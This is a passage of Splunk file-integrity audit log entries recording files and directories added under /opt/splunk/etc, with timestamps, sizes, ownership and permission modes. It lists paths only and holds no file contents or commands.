uid=41812, modtime="Sat May 1 18:45:21 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:43:05.406, user=n/a, action=add,path="/opt/splunk/etc/modules/input/RemoteQueue", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:21 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:43:05.403, user=n/a, action=add,path="/opt/splunk/etc/modules/input/FIFO", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:21 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:43:05.297, user=n/a, action=add,path="/opt/splunk/etc/modules/distributedDeployment/classes/deploymentserver/deployment.conf", isdir=0, size=103, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:05.293, user=n/a, action=add,path="/opt/splunk/etc/modules/distributedDeployment/classes/deployable/outputs.conf", isdir=0, size=239, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:05.288, user=n/a, action=add,path="/opt/splunk/etc/modules/distributedDeployment/classes/deployable/inputs.conf", isdir=0, size=102, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:05.282, user=n/a, action=add,path="/opt/splunk/etc/modules/distributedDeployment/classes/deployable/README", isdir=0, size=869, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:05.278, user=n/a, action=add,path="/opt/splunk/etc/modules/distributedDeployment/classes/deploymentserver", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:21 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:43:05.273, user=n/a, action=add,path="/opt/splunk/etc/modules/distributedDeployment/classes/deployable", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:21 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:43:05.268, user=n/a, action=add,path="/opt/splunk/etc/modules/distributedDeployment/classes", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:16 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:43:05.264, user=n/a, action=add,path="/opt/splunk/etc/modules/parsing/config.xml", isdir=0, size=4534, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:05.259, user=n/a, action=add,path="/opt/splunk/etc/modules/output/RemoteQueue/config.xml", isdir=0, size=1477, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:05.255, user=n/a, action=add,path="/opt/splunk/etc/modules/output/RemoteQueue", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:21 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:43:05.250, user=n/a, action=add,path="/opt/splunk/etc/modules/parsing", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:21 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:43:05.247, user=n/a, action=add,path="/opt/splunk/etc/modules/output", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:16 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:43:05.241, user=n/a, action=add,path="/opt/splunk/etc/modules/internal", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:16 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:43:05.237, user=n/a, action=add,path="/opt/splunk/etc/modules/input", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:16 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:43:05.234, user=n/a, action=add,path="/opt/splunk/etc/modules/distributedDeployment", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:16 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:43:05.130, user=n/a, action=add,path="/opt/splunk/etc/shcluster/users/README", isdir=0, size=132, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:05.125, user=n/a, action=add,path="/opt/splunk/etc/shcluster/apps/README", isdir=0, size=121, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:05.120, user=n/a, action=add,path="/opt/splunk/etc/shcluster/users", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:21 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:43:05.117, user=n/a, action=add,path="/opt/splunk/etc/shcluster/apps", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:21 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:43:05.112, user=n/a, action=add,path="/opt/splunk/etc/auth/crl/README", isdir=0, size=646, gid=41812, uid=41812, modtime="Sat May 1 18:22:53 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:05.109, user=n/a, action=add,path="/opt/splunk/etc/auth/audit/public.pem", isdir=0, size=451, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:04 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:43:05.105, user=n/a, action=add,path="/opt/splunk/etc/auth/audit/private.pem", isdir=0, size=1675, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:03 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:43:05.001, user=n/a, action=add,path="/opt/splunk/etc/auth/distServerKeys/trusted.pem", isdir=0, size=451, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:04 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:43:04.997, user=n/a, action=add,path="/opt/splunk/etc/auth/distServerKeys/private.pem", isdir=0, size=1675, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:04 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:43:04.993, user=n/a, action=add,path="/opt/splunk/etc/auth/scripts/commonAuth.py", isdir=0, size=2035, gid=41812, uid=41812, modtime="Sat May 1 18:22:53 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:04.988, user=n/a, action=add,path="/opt/splunk/etc/auth/scripts/SAML_script_okta.py", isdir=0, size=9319, gid=41812, uid=41812, modtime="Sat May 1 18:22:53 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:04.985, user=n/a, action=add,path="/opt/splunk/etc/auth/scripts/SAML_script_azure.py", isdir=0, size=9088, gid=41812, uid=41812, modtime="Sat May 1 18:22:53 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:04.981, user=n/a, action=add,path="/opt/splunk/etc/auth/prev_release/cacert.pem.default", isdir=0, size=912, gid=41812, uid=41812, modtime="Sat May 1 18:22:53 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:04.977, user=n/a, action=add,path="/opt/splunk/etc/auth/prev_release/ca.pem.default", isdir=0, size=1828, gid=41812, uid=41812, modtime="Sat May 1 18:22:53 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:04.973, user=n/a, action=add,path="/opt/splunk/etc/auth/splunkweb/privkey.pem", isdir=0, size=1675, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:08 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:43:04.970, user=n/a, action=add,path="/opt/splunk/etc/auth/splunkweb/cert.pem", isdir=0, size=1143, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:08 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:43:04.966, user=n/a, action=add,path="/opt/splunk/etc/auth/splunkweb/README", isdir=0, size=254, gid=41812, uid=41812, modtime="Sat May 1 18:22:53 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:04.961, user=n/a, action=add,path="/opt/splunk/etc/auth/splunkweb", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:08 2022", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:43:04.958, user=n/a, action=add,path="/opt/splunk/etc/auth/splunk.secret", isdir=0, size=254, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:01 2022", mode="r--------", hash=] Audit:[timestamp=10-06-2022 17:43:04.953, user=n/a, action=add,path="/opt/splunk/etc/auth/server.pem", isdir=0, size=4267, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:07 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:43:04.947, user=n/a, action=add,path="/opt/splunk/etc/auth/scripts", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:21 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:43:04.943, user=n/a, action=add,path="/opt/splunk/etc/auth/prev_release", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:21 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:43:04.939, user=n/a, action=add,path="/opt/splunk/etc/auth/distServerKeys", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:04 2022", mode="rwx--x---", hash=] Audit:[timestamp=10-06-2022 17:43:04.935, user=n/a, action=add,path="/opt/splunk/etc/auth/crl", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:21 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:43:04.931, user=n/a, action=add,path="/opt/splunk/etc/auth/cloudCA.pem", isdir=0, size=749, gid=41812, uid=41812, modtime="Sat May 1 18:22:53 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:04.928, user=n/a, action=add,path="/opt/splunk/etc/auth/cacert.pem.default", isdir=0, size=1265, gid=41812, uid=41812, modtime="Sat May 1 18:22:53 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:04.924, user=n/a, action=add,path="/opt/splunk/etc/auth/cacert.pem", isdir=0, size=1265, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:04 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:43:04.920, user=n/a, action=add,path="/opt/splunk/etc/auth/ca.srl", isdir=0, size=17, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:08 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:43:04.914, user=n/a, action=add,path="/opt/splunk/etc/auth/ca.pem.default", isdir=0, size=3099, gid=41812, uid=41812, modtime="Sat May 1 18:22:53 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:04.910, user=n/a, action=add,path="/opt/splunk/etc/auth/ca.pem", isdir=0, size=3099, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:04 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:43:04.905, user=n/a, action=add,path="/opt/splunk/etc/auth/audit", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:04 2022", mode="rwx--x---", hash=] Audit:[timestamp=10-06-2022 17:43:04.901, user=n/a, action=add,path="/opt/splunk/etc/auth/appsLicenseCA.pem", isdir=0, size=1647, gid=41812, uid=41812, modtime="Sat May 1 18:22:53 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:04.897, user=n/a, action=add,path="/opt/splunk/etc/auth/appsCA.pem", isdir=0, size=5268, gid=41812, uid=41812, modtime="Sat May 1 18:22:53 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:04.691, user=n/a, action=add,path="/opt/splunk/etc/init.d/README", isdir=0, size=819, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:04.688, user=n/a, action=add,path="/opt/splunk/etc/anonymizer/public-terms.txt", isdir=0, size=20484, gid=41812, uid=41812, modtime="Sat May 1 18:22:53 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:04.682, user=n/a, action=add,path="/opt/splunk/etc/anonymizer/private-terms.txt", isdir=0, size=23, gid=41812, uid=41812, modtime="Sat May 1 18:22:53 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:04.678, user=n/a, action=add,path="/opt/splunk/etc/anonymizer/names.txt", isdir=0, size=82560, gid=41812, uid=41812, modtime="Sat May 1 18:22:53 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:04.673, user=n/a, action=add,path="/opt/splunk/etc/anonymizer/dictionary.txt", isdir=0, size=353332, gid=41812, uid=41812, modtime="Sat May 1 18:22:53 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:04.669, user=n/a, action=add,path="/opt/splunk/etc/anonymizer/anonymizer-time.ini", isdir=0, size=4072, gid=41812, uid=41812, modtime="Sat May 1 18:22:53 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:04.664, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/appserver/controllers/swa_injector.py", isdir=0, size=528, gid=41812, uid=41812, modtime="Thu Apr 15 17:29:30 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:04.560, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/appserver/templates/splunk_instrumentation.html", isdir=0, size=2379, gid=41812, uid=41812, modtime="Thu Apr 15 17:29:30 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:04.556, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/appserver/static/build/pages/swa.js", isdir=0, size=35990, gid=41812, uid=41812, modtime="Thu Apr 15 17:29:30 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:04.552, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/appserver/static/build/pages/inst.js", isdir=0, size=2060140, gid=41812, uid=41812, modtime="Thu Apr 15 17:29:30 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:04.547, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/appserver/static/build/pages", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Apr 15 17:29:30 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:43:04.542, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/appserver/static/outputtelemetry.png", isdir=0, size=1007, gid=41812, uid=41812, modtime="Thu Apr 15 17:29:30 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:04.537, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/appserver/static/build", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Apr 15 17:29:30 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:43:04.533, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/appserver/templates", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Apr 15 17:29:30 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:43:04.529, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/appserver/static", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Apr 15 17:29:30 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:43:04.525, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/appserver/controllers", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Apr 15 17:29:30 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:43:04.520, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/default/data/ui/manager/instrumentation_index.xml", isdir=0, size=537, gid=41812, uid=41812, modtime="Thu Apr 15 17:29:30 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:04.517, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/default/data/ui/manager/instrumentation_index.env_cloud.xml", isdir=0, size=122, gid=41812, uid=41812, modtime="Thu Apr 15 17:29:30 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:04.406, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/default/data/ui/nav/default.xml", isdir=0, size=69, gid=41812, uid=41812, modtime="Thu Apr 15 17:29:30 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:04.400, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/default/data/ui/alerts/outputtelemetry.html", isdir=0, size=2859, gid=41812, uid=41812, modtime="Thu Apr 15 17:29:30 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:04.396, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/default/data/ui/nav", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Apr 15 17:29:30 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:43:04.391, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/default/data/ui/manager", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Apr 15 17:29:30 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:43:04.387, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/default/data/ui/alerts", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Apr 15 17:29:30 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:43:04.383, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/default/data/ui", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Apr 15 17:29:30 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:43:04.378, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/default/web.conf", isdir=0, size=1039, gid=41812, uid=41812, modtime="Thu Apr 15 17:29:30 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:04.374, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/default/telemetry.conf", isdir=0, size=385, gid=41812, uid=41812, modtime="Thu Apr 15 17:29:30 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:04.369, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/default/searchbnf.conf", isdir=0, size=1749, gid=41812, uid=41812, modtime="Thu Apr 15 17:29:30 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:04.365, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/default/savedsearches.conf", isdir=0, size=54896, gid=41812, uid=41812, modtime="Thu Apr 15 17:29:30 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:04.361, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/default/restmap.conf", isdir=0, size=2454, gid=41812, uid=41812, modtime="Thu Apr 15 17:29:30 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:04.357, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/default/props.conf", isdir=0, size=1146, gid=41812, uid=41812, modtime="Thu Apr 15 17:29:30 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:04.353, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/default/macros.conf", isdir=0, size=1968, gid=41812, uid=41812, modtime="Thu Apr 15 17:29:30 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:04.349, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/default/inputs.conf", isdir=0, size=1310, gid=41812, uid=41812, modtime="Thu Apr 15 17:29:30 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:04.343, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/default/data", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Apr 15 17:29:30 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:43:04.339, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/default/commands.conf", isdir=0, size=164, gid=41812, uid=41812, modtime="Thu Apr 15 17:29:30 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:04.335, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/default/collections.conf", isdir=0, size=311, gid=41812, uid=41812, modtime="Thu Apr 15 17:29:30 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:04.331, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/default/app.conf", isdir=0, size=305, gid=41812, uid=41812, modtime="Thu Apr 15 17:29:30 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:04.328, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/default/alert_actions.conf", isdir=0, size=713, gid=41812, uid=41812, modtime="Thu Apr 15 17:29:30 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:04.223, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/metadata/local.meta", isdir=0, size=67, gid=41812, uid=41812, modtime="Thu Oct 6 17:35:58 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:43:04.217, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/metadata/default.meta", isdir=0, size=210, gid=41812, uid=41812, modtime="Thu Apr 15 17:29:30 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:04.214, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/README/telemetry.conf.spec", isdir=0, size=5171, gid=41812, uid=41812, modtime="Thu Apr 15 17:29:30 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:04.210, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/README/telemetry.conf.example", isdir=0, size=862, gid=41812, uid=41812, modtime="Thu Apr 15 17:29:30 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:04.207, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/README/savedsearches.conf.spec", isdir=0, size=659, gid=41812, uid=41812, modtime="Thu Apr 15 17:29:30 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:04.203, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/README/alert_actions.conf.spec", isdir=0, size=419, gid=41812, uid=41812, modtime="Thu Apr 15 17:29:30 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:04.099, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/bin/splunk_instrumentation/metrics/__pycache__/metrics_transforms.cpython-37.pyc", isdir=0, size=2379, gid=41812, uid=41812, modtime="Thu Oct 6 17:35:57 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:43:04.095, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/bin/splunk_instrumentation/metrics/__pycache__/metrics_transforms.cpython-37.opt-1.pyc", isdir=0, size=2379, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:15 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:43:04.090, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/bin/splunk_instrumentation/metrics/__pycache__/metrics_schema.cpython-37.pyc", isdir=0, size=4203, gid=41812, uid=41812, modtime="Thu Oct 6 17:35:57 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:43:04.086, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/bin/splunk_instrumentation/metrics/__pycache__/metrics_schema.cpython-37.opt-1.pyc", isdir=0, size=4203, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:15 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:43:04.081, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/bin/splunk_instrumentation/metrics/__pycache__/instance_profile.cpython-37.pyc", isdir=0, size=6872, gid=41812, uid=41812, modtime="Thu Oct 6 17:35:57 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:43:04.078, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/bin/splunk_instrumentation/metrics/__pycache__/instance_profile.cpython-37.opt-1.pyc", isdir=0, size=6872, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:15 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:43:04.072, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/bin/splunk_instrumentation/metrics/__pycache__/__init__.cpython-37.pyc", isdir=0, size=177, gid=41812, uid=41812, modtime="Thu Oct 6 17:35:57 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:43:04.069, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/bin/splunk_instrumentation/metrics/__pycache__/__init__.cpython-37.opt-1.pyc", isdir=0, size=177, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:15 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:43:03.961, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/bin/splunk_instrumentation/metrics/metrics_transforms.py", isdir=0, size=2577, gid=41812, uid=41812, modtime="Thu Apr 15 17:29:30 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:03.956, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/bin/splunk_instrumentation/metrics/metrics_schema.py", isdir=0, size=2873, gid=41812, uid=41812, modtime="Thu Apr 15 17:29:30 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:03.951, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/bin/splunk_instrumentation/metrics/metrics_collection_manager.py", isdir=0, size=6069, gid=41812, uid=41812, modtime="Thu Apr 15 17:29:30 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:03.946, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/bin/splunk_instrumentation/metrics/instance_profile.py", isdir=0, size=9088, gid=41812, uid=41812, modtime="Thu Apr 15 17:29:30 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:03.941, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/bin/splunk_instrumentation/metrics/__pycache__", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Oct 6 17:35:57 2022", mode="rwx--x---", hash=] Audit:[timestamp=10-06-2022 17:43:03.937, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/bin/splunk_instrumentation/metrics/__init__.py", isdir=0, size=0, gid=41812, uid=41812, modtime="Thu Apr 15 17:29:30 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:43:03.932, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/bin/splunk_instrumentation/dataPoints/__pycache__/spl_data_point.cpython-37.pyc", isdir=0, size=1720, gid=41812, uid=41812, modtime="Thu Oct 6 17:35:57 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:43:03.928, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/bin/splunk_instrumentation/dataPoints/__pycache__/spl_data_point.cpython-37.opt-1.pyc", isdir=0, size=1720, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:15 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:43:03.925, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/bin/splunk_instrumentation/dataPoints/__pycache__/report_data_point.cpython-37.pyc", isdir=0, size=1716, gid=41812, uid=41812, modtime="Thu Oct 6 17:35:57 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:43:03.921, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/bin/splunk_instrumentation/dataPoints/__pycache__/report_data_point.cpython-37.opt-1.pyc", isdir=0, size=1716, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:15 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:43:03.917, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/bin/splunk_instrumentation/dataPoints/__pycache__/data_point.cpython-37.pyc", isdir=0, size=980, gid=41812, uid=41812, modtime="Thu Oct 6 17:35:57 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:43:03.911, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/bin/splunk_instrumentation/dataPoints/__pycache__/data_point.cpython-37.opt-1.pyc", isdir=0, size=980, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:15 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:43:03.906, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/bin/splunk_instrumentation/dataPoints/__pycache__/__init__.cpython-37.pyc", isdir=0, size=180, gid=41812, uid=41812, modtime="Thu Oct 6 17:35:57 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:43:03.902, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_instrumentation/bin/splunk_instrumentation/dataPoints/__pycache__/__init__.cpython-37.opt-1.pyc", isdir=0, size=180, gid=41812, uid=41812, modtime="Thu Oct 6 17:31:15 